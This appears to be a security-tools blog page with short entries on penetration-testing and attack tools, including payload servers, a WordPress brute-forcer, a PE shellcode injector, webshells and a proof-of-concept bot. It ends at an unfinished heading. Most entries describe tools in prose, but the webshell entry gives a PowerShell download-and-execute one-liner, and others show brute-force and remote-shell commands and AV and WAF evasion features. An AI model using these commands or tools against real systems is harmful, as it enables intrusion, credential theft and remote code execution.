Maligno - Penetration Testing Tool that Serves Metasploit Payloads

12:57 PM Linux, Maligno, Metasploit, Metasploit Framework, Metasploit Payloads, msfvenom, Python, Shellcode, Shellcode obfuscation

Maligno is an open source penetration testing tool that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded with Base64 prior to transmission.

Changelog: Metasploit multi-host support, socks4a server support (metasploit), last resort redirection for invalid requests and hosts out of scope, automatic client code obfuscation, delayed client payload execution, automatic metasploit resource file generation.

Features

Encrypted communications: Maligno is a web server which communicates via HTTP or HTTPS with the clients. Communications are encrypted with AES and encoded with Base64 both for HTTP and HTTPS. Encryption and encoding parameters can be configured. Clients do NOT validate the server certificate by default.
On the fly shellcode generation – per session mode: Maligno will generate shellcode while starting up, and it will cache it for later use. Maligno will serve the cached shellcode to all clients that request it during the session. Maligno will maintain a cache for each configured Metasploit payload. The cache is removed when Maligno is shut down.
Multi-payload support: You may configure Maligno with several Metasploit payloads. Clients can request different payloads to the server. Payloads are referred by an index, which is passed as a GET parameter. Such parameter can be also configured.
Multi-server support: Maligno can run on a single server with Metasploit or in separate machines. Clients will connect to Maligno, and Maligno will generate shellcode that points to a pre-configured Metasploit multi-handler.
SOCKS4a proxy support: Maligno helps you starting a Metasploit auxiliary socks4a proxy, which can be used with payloads such as reverse_https_proxy. This will allow you to send all your traffic through your Maligno server, in case of having a multi-server environment.
Scope definition: Maligno allows you to define single IP addresses or ranges. This will ensure that your shellcode is served only to machines involved in your pentest. You may also use a wildcard in order to accept ANY address.
Last resort redirection: Maligno will redirect hosts out of scope, or hosts sending invalid requests, to a configured URL.
Client code generator and pseudorandom obfuscator: Maligno comes with a script that will generate and obfuscate (pseudorandomly) client code ready for use, based on your server configuration.
Delayed client execution: Maligno clients use a basic random execution delay, which attempts to bypass AV-sandboxes.
Metasploit resource file generator: Maligno generates MSF resource files based on your configuration, which can be used with msfconsole right away.

Download Maligno

Dradis v2.9 - Information Sharing For Security Assessments

3:29 PM Dradis, Information discovery, Information Sharing, Linux, Security Assessments, Windows

Dradis is an open source framework to enable effective information sharing, specially during security assessments. It’s a tool specifically to help in the process of penetration testing. Penetration testing is about information:

Information discovery
Exploit useful information
Report the findings

But penetration testing is also about sharing the information you and your teammates gather. Not sharing the information available in an effective way will result in exploitation opportunities lost and the overlapping of efforts.

Dradis is a self-contained web application that provides a centralised repository of information to keep track of what has been done so far, and what is still ahead.

Features

Easy report generation.
Support for attachments.
Integration with existing systems and tools through server plugins.
Platform independent.

Traditional pentesting teams face different types of challenges regarding information sharing. Different tools provide output in different formats, different testers capture evidence in different ways, different companies report differently, etc.

If you do not use a tool to share the information, every tester will use their own notes file to keep track of their findings. Each will store this file locally, or on a shared resource, but the information will not arrive immediately to the rest of the team.

If you want to know what are the latest findings of your mate, you will need to look for the notes file. You also can try talking, but talking is not that effective when you need to know a specific cookie value or a sql query for an injection attack.

It seems reasonable that some effort must be put to increase the quality and efficiency of this process.

Download Dradis

The Mole - Automatic SQL Injection Exploitation Tool

1:47 PM Automatic SQL Injection, Linux, Mac, SQL Injection, SQL Injection Exploitation, SQLi, Windows

The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.

Features

Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
Command line interface. Different commands trigger different actions.
Auto-completion for commands, command arguments and database, table and columns names.
Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
Exploits SQL Injections through GET/POST/Cookie parameters.
Developed in python 3.
Exploits SQL Injections that return binary data.
Powerful command interpreter to simplify its usage.

Download The Mole

SmartSPLAT - Tool to troubleshoot Checkpoint firewall issues and perform management tasks

8:45 AM Checkpoint Firewall, Management Tasks, SmartSPLAT, Windows

Smart SPLAT is a freeware software to troubleshoot Checkpoint firewall issues and perform management tasks.

It periodically checks for an update and when a new release is published, updates itself via the SmartSPLAT web site.

SmartSPLAT lets you connect to your firewall via secure channel SSH

Critical commands like cpstop, kill, reboot and etc. deleting a license or similar commands that can cause your firewall not to function properly are colored red protected by checkboxes and shows confirmation dialogs.

In this project we have used an ssh Library based on the Poderosa project.

For file transfer operations, SmartSPLAT uses putty pscp.exe, to work with SCP /etc/scpusers/ file should be modified.

Smart SPLAT has a script named preparescp. It checks if user exists at /etc/scpusers/ if not, adds a line for it.

Download SmartSPLAT

Smart Pentester - An SSH based Penetration Testing Framework

8:42 AM Penetration Testing Framework, Smart Pentester, SSH based, Windows

Smart Pentester is an SSH based Penetration Testing Framework. It provides a GUI for well known tools like nmap, hping, tcpdump, volatility, hydra and etc.

Smart Pentester Framework will provide you a User Interface for Penetration testing, Malware Analysis, Forensic Analysis, Cyber Intelligence, Advanced packet generation techniques and more...

Download Smart Pentester

Hexorbase - Multiple Database Management and Audit Tool

3:46 PM Database Audit, Database Management, Hexorbase, Linux, Microsoft SQL Server, Multiple Database, MySQL, Oracle, PostgreSQL, Python, SQLite, Windows

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

It works on Linux and Windows running the following:

Requirements:

python
python-qt4
cx_Oracle
python-mysqldb
python-psycopg2
python-pymssql
python-qscintilla2

To install simply run the following command in terminal after changing directory to the path were the downloaded package is:

root@host:~# dpkg -i hexorbase_1.0_all.deb

Download Hexorbase

WebSiteSniffer v1.41 - Captures all Web site files downloaded by your Web browser while browsing the Internet

4:53 PM Sniffer, Sniffing, WebSiteSniffer, Windows

WebSiteSniffer is a packet sniffer tool that captures all Web site files downloaded by your Web browser while browsing the Internet, and stores them on your hard drive under the base folder that you choose. WebSiteSniffer allows you to choose which type of Web site files will be captured: HTML Files, Text Files, XML Files, CSS Files, Video/Audio Files, Images, Scripts, and Flash (.swf) files.

While capturing the Web site files, the main window of WebSiteSniffer displays general statistics about the downloaded files for every Web site / host name, including the total size of all files (compressed and uncompressed) and total number of files for every file type (HTML, Text, Images, and so on)

Download WebSiteSniffer v1.41

HackPorts - Mac OS X Penetration Testing Framework and Tools

2:50 PM EN, HackPorts, Mac, Mac OS X, Mac OS X Penetration Testing, Penetration Testing Framework

HackPorts was developed as a penetration testing framework with accompanying tools and exploits that run natively on Mac platforms. HackPorts is a ‘super-project’ that leverages existing code porting efforts, security professionals can now use hundreds of penetration tools on Mac systems without the need for Virtual Machines.

Tool List:

0trace
3proxy
Air – Automated Image Installer
Android APK Tool
Android SDK Framework
Apache Users
Autospy
BLINDELEPHANT
BRAA
Bed
Beef
Binwalk
Btdsd
CHKRootKit
CHNTPwd
Casefile – Maltego
Cewl
Cisc0wn
Cisco Scanner (ciscos)
Cisco Torch
Cisco global exploiter
Credump
Creepy
Crunch
Cupp
CutyCapt
DBD (Durandal’s Backdoor)
DDSquat
DD_Rescue
DHCPig
DNSChef
DNSMAP
DNSRECON
DNSTRACER
DNmap
DPScan
DarkStat
DavTest
DeD
DerogDom
DirBuster
Dozer (Formally Mercury)
Droidbox
Encryption Wizard
EvilGrade
ExifTool
Exiting the Social-Engineer Toolkit (SET)
ExploitDB
FIERCE2
FTester
Fast-Track
Flasm
GoldenEye
Golismero
Grabber
Grendle Scan
HIOC
HashTag
Hashcat-utils
Hexinject
IAXFlood
IDAPro-Free
Intersect
Inundator
JBoss-Autopwn
JD – Java Decompiler
JavaLOIC.jar
John
Johnny
Joomscan
Kautilya
Killerbee
Kismac2
Laudanum
Libhijack
Linux Exploit Suggester
Lynis
MagicTree
MaskGen
Metagoofil
Mork.pl
Multimac
Netdiscover
Netifera
Nikto
ONESIXYONE
OWASP Mantra
OllyDbg – Debugger
OpenVas
OphCrack
Padbuster
Passdb
Patator

Patator
PdfBook
PeachFuzz
Phrasen | Drescher
Powerfuzzer
Pyrit
RFIDIOt
RSMangler
Rebind
Rec-Studio
ReverseRaider
SCTPScan
SFUZZ
SIPARMYKNIFE
SMBExec
SMTP-USER-ENUM
SNMPCheck
SPAMHole
SQLLHF
SSLCaudit
SSLSniff
SSLStrip
SUCrack
Samdump
Sipcrack
Skipfish
Smali
Smartphone-Pentest-Framework
StatProcessor
TCPReplay
TLSSLed
TWOFI
TestDisk
TestSSL
ToolName
Truecrack
UAtester
UBERHARVEST
Unicornscan
Uniscan
Vega
Vinetto
Volatility
W3af
WCE – Windows Credential Editor
WIFITap
WOL-E
WPScan
Waffit
Wapiti
Web Backdoor Compilation (wbc)
Webscrab – OWASP
Webshag
Webslayer
Whatweb
XSpy
acccheck
adsnmp
aircrack-ng
artemisa
asp-audit.pl ASP Auditor
automater
bbqsql
bluediving
bluelog
bluemaho
bluepot
blueranger
bt-attacks
burpsuite
c07-sip-r2.jar
cdpsnarf
cisco-auditing-tool
cmospwd
cms-explorer
copy-router-config
cymothoa
darkMySQLi
dbpwaudit
deBlaze
dedected
dex2jar
dirb
dns2tcpc
dnsenum
dotdotpwn
easy-creds
enumIAX
evtparse.pl Parse Event log (Win2000, XP, 2003)
fierce
fimap
findmyhash.py
getsids

giskismet
goofile
goohost
gooscan
hack library
hash_id.py – Hash Identifer
hashcat
hexorbase
htexploit
httprint
httsquash
iWar
impacket-examples
intercepter-ng
iodine
iphoneanalyzer
ipv6toolset
jigsaw
keimpx.py
lanmap2
lbd – load balancing detector
letdown
make-pdf-javascript.py
manglefizz
mdb-export
merge-router-config
miranda
mitmproxy
mopest-2.pl
netgear-telnetenable
nimbostratus
oat (Oracle Auditing Tool)
ocs (OCS Cisco Scanner)
oscanner
packetstorm
pdf-parser
pdfid.py
pdgmail
peePDF
phrasenoia
pipal
plecost
pompem
powersploit
pref – Parse contents of XP/Vista Prefetch files/directory
proxystrike
ptunnel
pwnat
pytbull
rcracki_mt
redfang – the bluetooth hunter
revealertoolkit
rtpflood
rtpinject
rtpinsertsound
rtpmixsound
samdump2
sapyto – SAP Penetration Testing Framework
sidguesser
sipp
sipscan
sipvicious
spooftooph
sqlbrute
sqldict
sqlmap
sqlninja
sqlscan
sqlsus
sslyze
swaks – Swiss Army Knife for SMTP
tftp brute force
thcsslcheck
theHarvester
thebackdoorfactory
tnscmdlOg
trixd00r
u3-pwn
udp.pl – UDP Flood
udptunnel
unix-priv-check
untidy – XML Fuzzer
voiphoney
volafox
warvox
websecurify
websploit
weevely
wfuzz
xsser
yersinia
zaproxy – OWAS Zap

Download HackPorts

Wireless Network Watcher - Show who is connected to your wireless network

2:58 PM IP address, MAC Address, Show who is connected, Wireless, Wireless Network Watcher

Wireless Network Watcher is a small utility that scans your wireless network and displays the list of all computers and devices that are currently connected to your network.

For every computer or device that is connected to your network, the following information is displayed: IP address, MAC address, the company that manufactured the network card, and optionally the computer name.

You can also export the connected devices list into html/xml/csv/text file, or copy the list to the clipboard and then paste into Excel or other spreadsheet application.

Download Wireless Network Watcher

Remote DLL - Simple & Free Tool to Inject or Remove DLL from Remote Process

1:43 PM Freeing DLL, Inject DLL, Remote DLL, Removing DLL, Windows

RemoteDLL is the simple tool to Inject DLL or Remove DLL from Remote Process. It is based on popular Dll Injection technique.

It supports following DLL Injection methods

CreateRemoteThread
NtCreateThread [Good for DLL Injection across sessions on Vista/Windows 7]
QueueUseAPC [Delayed Injection]

Removing DLL or Freeing DLL from Process is the unique feature of RemoteDLL. It can help you to instantly remove DLL from target process completely.

Now a days, many Malware & Spyware programs use the DLL Injection technique to hide themselves into legitimte system process. Once injected there is no way to remove such DLL other than killing the process itself.

In such situations, RemoteDLL can help you to remove these Malicious DLLs from the target process easily.

Current mega version supports Injecting DLL and Removing DLL from 64 bit process along with numerous improvements for Windows 8.

Download RemoteDLL

ArchAssault - Arch Linux ISO for Penetration Testers

4:55 PM Arch Linux, ArchAssault, Distribution, Distro, ISO for Penetration Testers, Linux

The ArchAssault Project is an Arch Linux derivative for penetration testers, security professionals and all-around Linux enthusiasts. This means we import the vast majority of the official upstream Arch Linux packages, these packages are unmodified from their upstream source.

While our Arch Linux base is primarily untouched, there are times were we have to fork a package to be able to better support our vast selection of tools. All of our packages strive to maintain the Arch Linux standards, methods and philosophies.

Download ArchAssault

wpbf - WordPress Brute Force

1:54 PM Linux, Mac, Python, Windows, WordPress, WordPress Brute Force, wpbf

The script will try to login into the WordPress dashboard through the login form using a mixture of enumerated usernames, a wordlist and relevant keywords from the blog's content. If a single username is given, the script will not search for additional usernames.

When a correct username/passwords matchs, it will be logged and show on the standard output.

For faster results you can spawn threads but BE CAREFULL not to flood/DoS the site. Default settings can be changed in "config.py" and "logging.conf" files.

The wordlist must have one entry per line, a small wordlist (wordlist.txt) and plugin list (plugins.txt) are provided for testing purposes.

Features

Username enumeration and detection (TALSOFT-2011-0526, Author's archive page and content parsing)
Threads
Use keywords from blog's content in the wordlist
HTTP Proxy Support
Basic WordPress fingerprint (version and full path)
Advance plugins fingerprint (bruteforce, discovery and version/documentation)
Detection of Login LockDown plugin (this plugin makes the bruteforce useless)
Advanced logging using Python's logging library and logging configuration file

Usage

Basic

In this example, wpbf will do a bruteforce test using the default settings (you can change the default settings in config.py). It will enumerate usernames, find keywords and plugins, use the static+generated wordlist to bruteforce each user and try to guess remote path:

$ ./wpbf.py http://localhost/wordpress/
2012-02-26 14:26:18,793 - INFO - Target URL: http://localhost/wordpress/
2012-02-26 14:26:18,844 - INFO - Checking URL and username...
2012-02-26 14:26:18,845 - INFO - Enumerating users...
2012-02-26 14:26:52,027 - INFO - Usernames: admin, test, guest
2012-02-26 14:26:54,153 - INFO - 31 plugins will be tested
2012-02-26 14:26:55,311 - INFO - 215 passwords will be tested
2012-02-26 14:26:55,369 - INFO - Starting workers...
2012-02-26 14:26:56,685 - INFO - WordPress version: 3.0.1
2012-02-26 14:26:57,570 - INFO - WordPress path in server: /var/www/wordpress/
2012-02-26 14:27:08,624 - INFO - Plugin 'akismet' was found
2012-02-26 14:27:10,292 - INFO - Plugin 'akismet' version: 2.5.5 (more info @ http://localhost/wordpress/wp-content/plugins/akismet/readme.txt)
221 tasks left / 2.1 tasks per second / 1.76min left
199 tasks left / 2.2 tasks per second / 1.51min left
172 tasks left / 2.7 tasks per second / 1.06min left
21 tasks left / 1.6 tasks per second / 0.22min left
2012-02-26 14:57:23,245 - INFO - Password 'qawsed' found for username 'admin' on http://localhost/wordpress/wp-login.php

Username enumeration only

The '-eu' or '--enumerateusers' parameter will only do username enumeration and list the usernames found

$ ./wpbf.py -eu http://www.mysite.com/blog/

Aggresive

You can spawn more threads to speed up the bruteforce process. Be aware that using a lot of threads can cause hangs in the server or denial of service. For this example we will spawn 23 threads:

$ ./wpbf.py -t 23 http://www.mysite.com/blog/

Custom

Using username 'john', not using keywords in the blog content for the wordlist and trough a local proxy:

$ ./wpbf.py --nokeywords -u john -p http://localhost:8008/ http://www.mysite.com/blog/

Download wpbf

Automater v2.0 - URL/Domain, IP Address, and Md5 Hash OSINT Tool

9:30 AM Automater, Gathering, Information Gathering, Linux, OSINT Tool, Windows

Automater is a URL/Domain, IP Address, and Md5 Hash OSINT tool aimed at making the analysis process easier for intrusion Analysts. Given a target (URL, IP, or HASH) or a file full of targets Automater will return relevant results from sources like the following: IPvoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, Labs.alienvault.com, ThreatExpert, VxVault, and VirusTotal.

*Automater is installed on HoneyDrive and Kali by default but currently have an outdated version.

Installation:

Automater comes in two flavors, python script that will work for Linux or Windows, and an exe for Windows.

Windows:

The Windows client is currently in development. In the meantime the python code will work on Windows with a python 2.7 install

Linux:

As this is a python script you will need to ensure you have the correct version of python, which for this script is python 2.7. I used mostly standard libraries, but just incase you don't have them, here are the libraries that are required: httplib2, re, sys, argparse, urllib, urllib2

With the python and the libraries out of the way, you can simply use git to clone the tekdefense code to your local machine.

git clone https://github.com/1aN0rmus/TekDefense-Automater.git

Usage:
Once installed the usage is pretty much the same across Windows, Linux, and Kali.

python Automater.py -h

or if you chmod +x Automater.py you can



    ./Automater.py -h

    usage: Automater.py [-h] [-o OUTPUT] [-w WEB] [-c CSV] [-d DELAY] [-s SOURCE]

                        [--p]

                        target

     

    IP, URL, and Hash Passive Analysis tool

     

    positional arguments:

      target                List one IP Addresses, URL or Hash to query or pass

                            the filename of a file containing IP Addresses, URL or

                            Hash to query each separated by a newline.

     

    optional arguments:

      -h, --help            show this help message and exit

      -o OUTPUT, --output OUTPUT

                            This option will output the results to a file.

      -w WEB, --web WEB     This option will output the results to an HTML file.

      -c CSV, --csv CSV     This option will output the results to a CSV file.

      -d DELAY, --delay DELAY

                            This will change the delay to the inputted seconds.

                            Default is 2.

      -s SOURCE, --source SOURCE

                            This option will only run the target against a

                            specific source engine to pull associated domains.

                            Options are defined in the name attribute of the site

                            element in the XML configuration file

      --p                   This option tells the program to post information to

                            sites that allow posting. By default the program will

                            NOT post to sites that require a post.

Download Automater v2.0

Windows Autologin Password Dumper & Manager v2.0

9:22 AM Windows, Windows Autologin, Windows Autologin Password, Windows Password Dumper

Windows Autologin Password is the free command-line tool to quickly dump and manage the Windows Automatic Logon Password.

Automatic Logon is one of the useful feature in Windows which allows you to login to system automatically without entering the password everytime. This tool helps you to easily dump the current Autologon password as well as quickly change the Autologon settings with just one command.
Here is the complete list of things that you can do with it,

Dump the Windows Auto Logon User & Password
Enable the Windows Auto Logon
Specify your Username & Password for Windows Auto Logon.
Disable the Windows Auto Logon

Once you set the Auto Logon username & password, you have to restart and next time you will be logged in automatically.
It is simple & easy to use tool. Also being a command-line based tool makes it perfect for automation.

'Windows Autologin Password' works on both both 32 bit & 64 bit versions and tested successfully on all Windows Platforms starting from Windows XP to latest version, Windows 8.

Download Windows Autologin Password v2.0

Hooker - Automated Dynamic Analysis of Android Applications

1:43 PM Analysis of Android Applications, Android, Hooker

Hooker is an opensource project for dynamic analysis of Android applications. This project provides various tools and applications that can be use to automaticaly intercept and modify any API calls made by a targeted application. It leverages Android Substrate framework to intercept these calls and aggregate all their contextual information (parameters, returned values, ...) in an elasticsearch database. A set of python scripts can be used to automatize the execution of an analysis in order to collect any API calls made by a set of applications.

Technical Description

Hooker is made of multiple modules:

APK-instrumenter is an Android application that must be installed prior to the analysis on an Android device (for instance, an emulator).
hooker_xp is a python tool that can be use to control the android device and trigger the installation and stimulation of an application on it.
hooker_analysis is a python script that can be use to collect results stored in the elasticsearch database.
tools/APK-contactGenerator is an Android application that is automatically installed on the Android device by hooker_xp to inject fake contact informations.
tools/apk_retriever is a Python tool that can be use to download APKs from various online public Android markets.
tools/emulatorCreator is a script that can be use to prepare an emulator.

Download Hooker

Passive Spider - Information Gathering from Search Engine Tool

2:39 PM Gathering, Information Gathering, Linux, Mac, Passive Spider, Ruby, Windows

Passive Spider uses search engines (currently only Bing supported) to find interesting information about a target domain.

INSTALL
git clone https://github.com/RandomStorm/passive-spider.git
cd passive-spider
gem install bundler && bundle install
Place your search engine API keys in the api_keys.config file. Each search engine API has different usage limits and pricing, refer to them for this information. Do not share your keys.
Tested on Mac OS X with Ruby 1.9.3 & Ruby 2.1.2.

ARGUMENTS

--domain   || -d    The domain you would like to use as a target.
--pages    || -p    The number of pages you would like to hit from the search engine. Default: 10
--all      || -a    Do all of the spidering checks. This is the default check.
--allpages          Find all pages related to the domain, limited by the --pages option.
--allfiles          Find all file types related to the domain, limited to the ones configured.
--neighbours        Find other domains that are on the same IP address.
--urlkeywords       Find page URLs that have 'interesting' keywords in them.
--keywords          Find page content that have 'interesting' keywords in them.
--export   || -e    Request URLs through proxy.
                    Specify a proxy (type://ip:port) or use defaults. Default: http://127.0.0.1:8080
--help     || -h    This output.

USAGE

- Run all checks against the given domain...
ruby pspider.rb -d www.example.com

- Run all checks against the admin subdomain...
ruby pspider.rb -d admin.example.com

- Run all checks against the given domain, limited to 50 search engine pages...
ruby pspider.rb -d www.example.com -p 50

- Run the IP Neighbour check against the given domain...
ruby pspider.rb -d www.example.com --neighbours

Download Passive Spider

YASAT - Yet Another Stupid Audit Tool

1:19 PM Audit Tool, Linux, YASAT

YASAT (Yet Another Stupid Audit Tool) is a simple stupid audit tool.

Its goal is to be as simple as possible with minimum binary dependencies (only sed, grep and cut)

Second goal is to document each test with maximum information and links to official documentation.

It do many tests for checking security configuration issue or others good practice.

It checks many software configurations like:

Apache
Bind DNS
CUPS
PHP
kernel configuration
mysql
network configuration
openvpn
Packages update
samba
snmpd
squid
syslog
tomcat
user accounting
vsftpd
xinetd

YASAT is licensed under GPLv3

Download YASAT

HashMyFiles - Calculate MD5/SHA1/CRC32 hashes of your files

3:15 PM Calculate CRC32, Calculate MD5, Calculate SHA1, HashMyFiles, Windows

HashMyFiles is small utility that allows you to calculate the MD5 and SHA1 hashes of one or more files in your system. You can easily copy the MD5/SHA1 hashes list into the clipboard, or save them into text/html/xml file.

HashMyFiles can also be launched from the context menu of Windows Explorer, and display the MD5/SHA1 hashes of the selected file or folder.

Using HashMyFiles

HashMyFiles doesn't require any installation process or additional DLL files. In order to start using it, simply run the executable file (HashMyFiles.exe).

After you run it, you can add files and folders that you want to view their MD5/SHA1 hashes. You can do it by using the 'Add File' and 'Add Folder' options under the File menu, or simply by draging the files and folder from Explorer into the main window of HashMyFiles.

After adding the desired files, you can copy the MD5/SHA1 hashes to the clipboard, or save the hashes list into text/html/xml file.

Download HashMyFiles

Shellter - A Dynamic ShellCode Injector

1:13 PM Linux, Metasploit, ShellCode Injector, Shellter

Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created.

It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only).

The shellcode can be something yours or something generated through a framework, such as Metasploit.

Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections, adding an extra section with RWE access,and whatever would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application.

Click here to read more.

Download Shellter

PAExec - The Redistributable PsExec (Launch Remote Windows Apps)

3:09 PM EN, Launch Remote Apps, PAExec, psexec, Windows

PAExec lets you launch Windows programs on remote Windows computers without needing to install software on the remote computer first. For example, you could launch CMD.EXE remotely and have the equivalent of a terminal session to the remote server. PAExec is useful for doing remote installs, checking remote configuration, etc.

PAExec - The Redistributable PsExec

Microsoft's PsExec tool (originally by SysInternal's Mark Russinovich) is a favorite of system administrators everywhere. It just has two tiny flaws:

PsExec can not be redistributed
Sensitive command-line options like username and passwords are sent as clear text

We needed something that would overcome those two issues, and not finding a suitable replacement, decided to write our own.

Examples

PAExec \\{server IP address} -s cmd.exe

Creates a telnet-like session on the remote server, running as Local System.

PAExec \\{server IP address} ipconfig

View network configuration on the remote server without needing to do an RDP session.

PAExec \\{server IP address} -u {username} -p {password} -i -c MyApp.exe

Copy MyApp.exe to the remote server and run it as {username} so that it shows up on the remote server.

Download PAExec

DarunGrim - A Patch Analysis and Binary Diffing Tool

2:27 PM Binary Diffing Tool, DarunGrim, EN, Patch Analysis, Windows

DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality.

Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it's fixing. You can use that information to learn what causes software break. Also that information can help you write some protection codes for those specific vulnerabilities. It's also used to write 1-day exploits by malware writers or security researchers.

This binary diffing technique is especially useful for Microsoft binaries. Not like other vendors they are releasing patch regularly and the patched vulnerabilities are relatively concentrated in small areas in the code. That makes the patched part more visible and apparent to the patch analyzers.

Download DarunGrim

XSSYA - Cross Site Scripting Scanner & Vulnerability Confirmation

6:14 AM Cross Site Scripting Scanner, Linux, Python, Scanner, Vulnerability Scanner, XSS, XSS scanner, XSSYA

XSSYA work by execute the payload encoded to bypass Web Application Firewall which is the first method request and response if it respond 200 it turn to Method 2 which search that payload decoded in web page HTML code if it confirmed get the last step which is execute document.cookie to get the cookie

XSSYA Features

* Support HTTPS

* After Confirmation (execute payload to get cookies)

* Can be run in (Windows - Linux)

* Identify 3 types of WAF (Mod_Security - WebKnight - F5 BIG IP)

*XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall)

* Support Saving The Web HTML Code Before Executing

the Payload Viewing the Web HTML Code into the Screen or Terminal

Download XSSYA

Nosql-Exploitation-Framework - A FrameWork For NoSQL Scanning and Exploitation Framework

3:15 PM Cassandra, Couch, EN, Exploitation Framework, FrameWork For NoSQL, H-Base, Linux, Mongo, NoSQL, NoSQL Scanning, Redis

A FrameWork For NoSQL Scanning, Enumeration and Exploitation.

NoSQL Databases are schema less databases. They were invented to store data easily and flexibly.

NoSQL Databases have gained popularity and its security has always been under the scanner.

The NoSQL Exploitation Framework focuses scanning,enumerating and exploiting these databases.

The tool has support for over 5 databases MongoDB,CouchDB,Redis,H-Base and Cassandra.

Added Features:

First Ever Tool With Added Support For Mongo,Couch,Redis,H-Base,Cassandra
Support For NoSQL WebAPPS
Added payload list for JS Injection,Web application Enumeration.
Scan Support for Mongo,CouchDB and Redis
Dictionary Attack Support for Mongo,Cocuh and Redis
Enumeration Module added for the DB's,retrieves data in db's @ one shot.
Currently Discover's Web Interface for Mongo
Shodan Query Feature
MultiThreaded IP List Scanner
Dump and Copy Database features Added for CouchDB
Sniff for Mongo,Couch and Redis

Installation

Run chmod+x install.sh nosqlmap.py
./install.sh
nosqlexp.py -h (For Help Options)

Sample Usage

nosqlexp.py -ip localhost -scan
nosqlexp.py -ip localhost -dict mongo -file b.txt
nosqlexp.py -ip localhost -enum couch
nosqlexp.py -ip localhost -enum redis
nosqlexp.py -ip localhost -clone couch
nosqlexp.py -ip localhost -webapp "web_app_link"

Download Nosql-Exploitation-Framework

Antak WebShell - A webshell which utilizes PowerShell

2:10 PM Antak, Antak WebShell, EN, PowerShell, Shell, WebShell, Windows

Antak is a webshell written in C#.Net which utilizes powershell. Antak is a part of Nishang and updates could be found here: https://github.com/samratashok/nishang

Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind while using commands (like changing current directory or running session aware scripts).

Executing PowerShell scripts on the target -

Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
Use powershell one-liner (example below) for download & execute in the command box. IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
By uploading the script to the target and executing it.
Make the script a semi-colon separated one-liner.

Files can be uploaded and downloaded using the respective buttons.

Uploading a file - To upload a file you must mention the actual path on server (with write permissions) in command textbox. (OS temporary directory like C:\Windows\Temp may be writable.) Then use Browse and Upload buttons to upload file to that path.

Downloading a file - To download a file enter the actual path on the server in command textbox. Then click on Download button.

Main Features:

Upload a file
Download a file
Executing Scripts
Remoting/Pivoting

Download Antak WebShell

Moo0 File Monitor - Monitor file access easily

1:56 PM EN, File Monitor, Moo0, Moo0 File Monitor, Windows

Moo0 File Monitor lets you easily monitor the file access activities on your system.

Have you ever wondered what's going on with your disk system behind your watch? Why the disk is busy? What's scratching your HDD? You may find them out using this simple program.

Download Moo0 File Monitor

OWASP Mantra Security Toolkit - Browser Based Security Framework

1:52 PM Browser, EN, Linux, Mac, Mantra, OWASP, OWASP Mantra, Security Toolkit, Windows

OWASP Mantra is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers,security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.

Mantra is lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes. Mantra is absolutely free of cost and takes no time for you to set up.

Mantra is a browser especially designed for web application security testing. By having such a product, more people will come to know the easiness and flexibility of being able to follow basic testing procedures within the browser. Mantra believes that having such a portable, easy to use and yet powerful platform can be helpful for the industry.

Mantra has many built in tools to modify headers, manipulate input strings, replay GET/POST requests, edit cookies, quickly switch between multiple proxies, control forced redirects etc. This makes it a good software for performing basic security checks and sometimes, exploitation. Thus, Mantra can be used to solve basic levels of various web.

Mantra Provides

A web application security testing framework built on top of a browser.
Supports Windows, Linux(both 32 and 64 bit) and Macintosh.
Can work with other software like ZAP using built in proxy management function which makes it much more convenient.
Available in 9 languages: Arabic, Chinese – Simplified, Chinese – Traditional, English, French, Portuguese, Russian, Spanish and Turkish
Comes installed with major security distributions including BackTrack and Matriux

Download OWASP Mantra

Xenotix xBOT - A Cross Platform PoC Bot that abuse certain Google Services to implement it's C&C

6:31 AM EN, Google Services, Linux, Mac, PoC, PoC Bot, Windows, Xenotix, Xenotix xBOT

Xenotix xBOT is a proof of concept cross platform (Linux, Windows, Mac) bot written in Python that abuse certain Google Services to implement Command & Control Center for the botnet. The Google Apps Data API, Google Forms and Google Spreadsheet is abused to implement C2 for a bot network. The Google Forms can act as the C2 for a bot network. All the entries to the Google Form are send to an attached Spreadsheet. Here we can implement a bot that will listen to the Google Data API URL and extract the commands and later send back the response via the same Form. The Google Data API allows us to fetch the contents of a published spreadsheet in a variety of formats. The spreadsheet feeds are fetched in RSS format and will parsed. For implementing the bot we will parse through the source, fetch the commands and do the corresponding operations. xBOT’s communication is encrypted as it uses Google’s own SSL connection and is nowhere affected by any firewalls as it works at Application layer. The botnet’s commands and responses are encrypted with SSL from Google Itself making it harder to sniff the bot’s communications in the network. It is a prototype bot with the bare minimum features of a Typical Bot. The intention of this tool is to give an idea about how Google API’s can be abused for Botnet Implementation.

xBOT COMMANDS

xSYSINFO : Get System Information
EXECUTE : Execute a passive system command
xDOWNLOAD : Download a file from an URL
xUPLOAD : Upload a file
xNETWORK : Get network information
xPORTSCAN : Run a Portscan
xSCREENSHOT : Grab a Screenshot
xKILL : Kill and Remove the xBOT.

Download Xenotix xBOT

Snoopy - A distributed tracking and data interception framework

